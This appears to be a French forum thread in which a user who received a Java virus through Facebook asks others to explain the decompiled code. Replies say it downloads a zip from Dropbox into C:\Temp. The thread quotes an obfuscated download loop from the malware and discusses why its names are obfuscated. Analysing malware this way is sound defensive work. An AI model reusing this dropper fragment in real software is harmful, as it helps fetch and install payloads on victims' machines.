Virus facebook
Un ami m'a envoyé un virus codé en java (c'est pas très gentil).
J'ai décompilé le .class et mis le code ici http://pastebin.com/rvKtXqui, il est plus lisible dans un éditeur (en enlevant le retour à la ligne automatique pour les lignes longues) et dans l'archive il y a dossier META-INF dans lequel il y a un ficher MANIFEST.MF
Est-ce qu'il y a un choual calé en code qui pourrait m'expliquer comment il fonctionne ?
Je t'ai décrit le fonctionnement ici :
http://pastebin.com/UdVXZ5Dg
En gros: Il télécharge sur dropbox un zip et le place à C:\Temp\
C'est à peu prés tout ce que j'ai récupérer.
Wow super, merci beaucoup ! C'est une chouette technique d'exécuter le script à sa sauce et de voir ce qu'il sort.
C'est que je me suis dit en lisant cette boucle à la fin:
for (String str1 : arrayOfString1)
{
URL localURL = new URL(str1);
HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
localHttpURLConnection.connect();
if (localHttpURLConnection.getResponseCode() / 100 == 2)
{
String str2 = str1;
String str3 = CCQTVKNAUSH() + ZQLCKNFOFZNYFWRJPSD();
GSMGKTSRIXYEMPSUH(str2, str3);
break;
}
}
Ouvrir des ports pour en faire un botnet ou télécharger un autre virus.
Mais tout ce qu'il y a avant ça m'échappe complet et j'aurais aimé qu'on m'explique vulgairement ce qui se fait.
Les variables il a du les appeler comme ça pour que ça fonctionne ou il les as toutes nommées normalement pour coder puis s'est amusée à leur mettre des noms à la con comme ZQLCKNFOFZNYFWRJPSD ?
